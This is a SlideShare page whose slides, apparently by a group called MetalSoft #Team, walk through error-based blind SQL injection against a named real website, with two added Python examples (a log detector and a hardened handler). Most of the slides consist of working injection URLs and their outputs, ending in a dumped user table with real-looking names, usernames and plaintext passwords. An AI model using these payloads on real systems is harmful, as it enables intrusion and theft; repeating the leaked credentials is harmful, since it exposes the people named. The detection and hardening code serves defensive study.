Error-based blind SQLi

MetalSoft #Team

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,888
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
22
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Error based blind sqli

1. MetalSoft #Team [Rs4 – xDarkSton3x – FailRoot – Root-M - Trouk]

Notice! The article presented below is the property of MetalSoft #Team; everything set out here was written by the Team's members. The reader is responsible for the "USE" made of the information presented here; MetalSoft #Team accepts no responsibility.
2. MySQL (Error Based) Blind SQLi

Sometimes we come across injections where "-1+union+select+0" or "order by" does not give you the number of columns and you cannot carry out the injection; we assure you that the first thing one does is fall back on a tool to do the work. This has happened to us in several injections, so we decided to research what other methods exist for this problem. The search gave us some results, but they still had to be put into practice to see whether they really worked.

For the exercise we will use http://www.audiser.com.ar/producto.php?id=1

Finding the database:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
The result will be: ERROR: --> 1062 - Duplicate entry ~audiser_audiser2011~1 for key group_key

Getting the current user:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~audiser_admin@localhost~1 for key group_key

Getting the version:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~5.1.58-community~1 for key group_key
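For the defender, the important detail in the requests above is how the oracle works: the injected subquery makes MySQL group rows on concat(<value>, floor(rand(0)*2)). rand(0) is a fixed seed, so the same group key is produced twice, MySQL raises error 1062, and the application writes the duplicate-key message, value included, into the page. Both halves leave a trace: the request has a distinctive "floor(rand(0)*2) ... group by" shape, and the application or web-server error log carries the "Duplicate entry ... for key group_key" text. The Python script below is an added example, not part of the slides, that flags both. It assumes an Apache/nginx combined-format access log and a plain-text application error log; the log lines embedded in it are constructed for the example (the first payload is copied from slide 2, the second is the same technique written with %20 encoding and upper-case keywords) and use documentation IP ranges.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request-side signatures of the floor(rand(0)*2) + GROUP BY duplicate-entry
# technique. They are applied to the URL-decoded, whitespace-collapsed,
# lower-cased request target produced by normalise().
SIGNATURES = {
    "rand_groupby_dup_key": re.compile(r"floor\(rand\(0\)\*2\).*group by", re.S),
    "information_schema_probe": re.compile(
        r"information_schema\.(tables|columns|schemata|user_privileges)"),
    "tilde_quote_delimiters": re.compile(r"concat\(0x7e,0x27"),
    "hex_schema_or_table": re.compile(r"(table_schema|table_name)=0x[0-9a-f]{8,}"),
}

# Response-side symptom: MySQL error 1062 with the grouped value between the
# ~ delimiters. Accepts both the bare form shown in the slides and MySQL's
# quoted form ('~'value'~1' for key 'group_key').
DUP_ENTRY_RE = re.compile(
    r"Duplicate entry '?~'?(?P<leak>[^~]*?)'?~\d'? for key '?group_key'?")


def normalise(target: str) -> str:
    """URL-decode twice (defeats double encoding), collapse whitespace,
    drop spaces around SQL punctuation, lower-case."""
    decoded = unquote_plus(unquote_plus(target))
    decoded = re.sub(r"\s+", " ", decoded)
    decoded = re.sub(r"\s*([(),=*])\s*", r"\1", decoded)
    return decoded.lower()


def analyse_line(line: str):
    """Return a finding for a request matching any signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = normalise(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    if not hits:
        return None
    return {
        "client": m.group("client"),
        "status": int(m.group("status")),
        "path": m.group("target").split("?", 1)[0],
        "signatures": hits,
    }


def scan_access_log(lines):
    """All findings from an iterable of access-log lines, in log order."""
    return [f for f in map(analyse_line, lines) if f]


def leaked_values(error_log_text: str):
    """Values that 1062 duplicate-entry errors exposed, one per matching line.
    Each one is a piece of data that reached a client and should be treated
    as disclosed."""
    return [m.group("leak") for m in DUP_ENTRY_RE.finditer(error_log_text)]


# Constructed sample data for the example (documentation IP ranges).
ACCESS_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /producto.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /producto.php?id=1+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(database()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 HTTP/1.1" 200 1610 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:56:02 +0000] "GET /producto.php?id=1%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=0x617564697365725f6175646973657232303131%20LIMIT%2012,1),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 1590 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /producto.php?id=42 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
]

ERROR_LOG = """\
[constructed] 2023-10-10 13:55:40 producto.php: ERROR: --> 1062 - Duplicate entry ~example_db~1 for key group_key
[constructed] 2023-10-10 13:56:02 producto.php: ERROR: --> 1062 - Duplicate entry '~'5.1.58-community'~1' for key 'group_key'
"""

if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG):
        print(finding)
    print("values disclosed through error 1062:", leaked_values(ERROR_LOG))
```

A normal request for id=1 or id=42 produces no finding; the two injected requests are flagged with the signature names that matched, and the error-log scan lists every value the 1062 message disclosed, which is the list of what must be treated as leaked during incident response.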
3. Current database
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~audiser_audiser2011~1 for key group_key

System user
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(system_user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~audiser_admin@localhost~1 for key group_key

Hostname
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(@@hostname as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~capri.dattaweb.com~1 for key group_key

Installation directory
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(@@basedir as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~/~1 for key group_key
4. DB User
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(GRANTEE as char),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~audiser_admin@localhost~1 for key group_key

Finding databases
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
N is incremented.
Result: ERROR: --> 1062 - Duplicate entry ~information_schema~1 for key group_key

Number of tables in the selected DB
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xDB_en_Hexa)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
(0xDB_en_Hexa stands for the database name in hex.)
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x617564697365725f6175646973657232303131)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~13~1 for key group_key
5. Table names in the DB
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x617564697365725f6175646973657232303131 limit 12,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~usuariosportal~1 for key group_key

Number of columns in the table
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x617564697365725f6175646973657232303131 AND table_name=0x7573756172696f73706f7274616c)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Table and DB in hex.
Result: ERROR: --> 1062 - Duplicate entry ~8~1 for key group_key

Columns in the table
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x617564697365725f6175646973657232303131 AND table_name=0x7573756172696f73706f7274616c limit 6,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
The first LIMIT is incremented by 1 to obtain the columns.
Result: ERROR: --> 1062 - Duplicate entry ~Password~1 for key group_key
6. Number of rows
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `audiser_audiser2011`.usuarios)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~3~1 for key group_key

Extracting data
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(usuarios.user_pass as char),0x27,0x7e) FROM `audiser_audiser2011`.usuarios LIMIT 2,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry ~1234~1 for key group_key

Finally we can obtain the following data:
DB: audiser_audiser2011
Table: usuarios
Columns: user_id, user_nyap, user_pass, user_usua
Data:
user_id | user_nyap         | user_pass | user_usua
5       | Audiser Argentina | 1234      | audiser11
2       | Juan Carlos Lange | 123       | juanca
1       | Pablo Abadi       | 2011      | pab_audi

We go on to look for the admin panel and HACKED..! MetalSoft #Team
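The slides never show the source of producto.php, but the behaviour they depend on is clear: the id parameter is pasted into the SQL text, and the raw MySQL error is written into the response, which is the channel every value above travelled through. The Python/sqlite3 example below is added here and is not taken from the slides or from the site; it puts that handler pattern next to a hardened one (integer validation, a bound parameter, and a generic error message with the real exception going only to the server log). The function names, the in-memory producto table and its rows are assumptions made for the example. SQLite is used so it runs offline; it has no rand(0)/GROUP BY duplicate-key quirk, so the error disclosure is shown with a missing-table error instead, and the point is the same: the vulnerable handler hands the client whatever the database says.

```python
import logging
import sqlite3

logging.basicConfig(level=logging.WARNING, format="%(levelname)s %(message)s")
log = logging.getLogger("producto")


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's product table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE producto (id INTEGER PRIMARY KEY, nombre TEXT NOT NULL);
        INSERT INTO producto VALUES (1, 'Consola'), (2, 'Microfono'), (3, 'Altavoz');
        """
    )
    return conn


def producto_vulnerable(conn: sqlite3.Connection, raw_id: str) -> dict:
    """The pattern the slides exploit: the raw parameter is concatenated into the
    SQL text and the database's own error message is returned to the client."""
    sql = "SELECT id, nombre FROM producto WHERE id = " + raw_id
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # This is the oracle: the client learns exactly what the database said.
        return {"error": f"ERROR: --> {exc}", "rows": []}
    return {"error": None, "rows": rows}


def producto_hardened(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Same endpoint with three fixes: type check, bound parameter, generic error."""
    try:
        product_id = int(raw_id)  # anything that is not an integer is rejected outright
    except ValueError:
        return {"error": "invalid id", "rows": []}
    try:
        rows = conn.execute(
            "SELECT id, nombre FROM producto WHERE id = ?", (product_id,)
        ).fetchall()
    except sqlite3.Error as exc:
        # Detail stays server-side; the client only sees a generic message.
        log.error("producto query failed for id=%r: %s", product_id, exc)
        return {"error": "internal error", "rows": []}
    return {"error": None, "rows": rows}


if __name__ == "__main__":
    db = build_db()
    for raw in ("2", "1 or 1=1", "1 and (select x from no_such_table)"):
        print(f"id={raw!r}")
        print("  vulnerable:", producto_vulnerable(db, raw))
        print("  hardened:  ", producto_hardened(db, raw))
```

Running it shows the vulnerable handler returning every product for "1 or 1=1" and echoing "no such table: no_such_table" for the error-provoking input, while the hardened handler rejects both before any SQL is built and returns exactly one row for a well-formed id. The int() check alone would stop the injections in the slides, but the bound parameter is the fix that also covers parameters that legitimately are strings.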
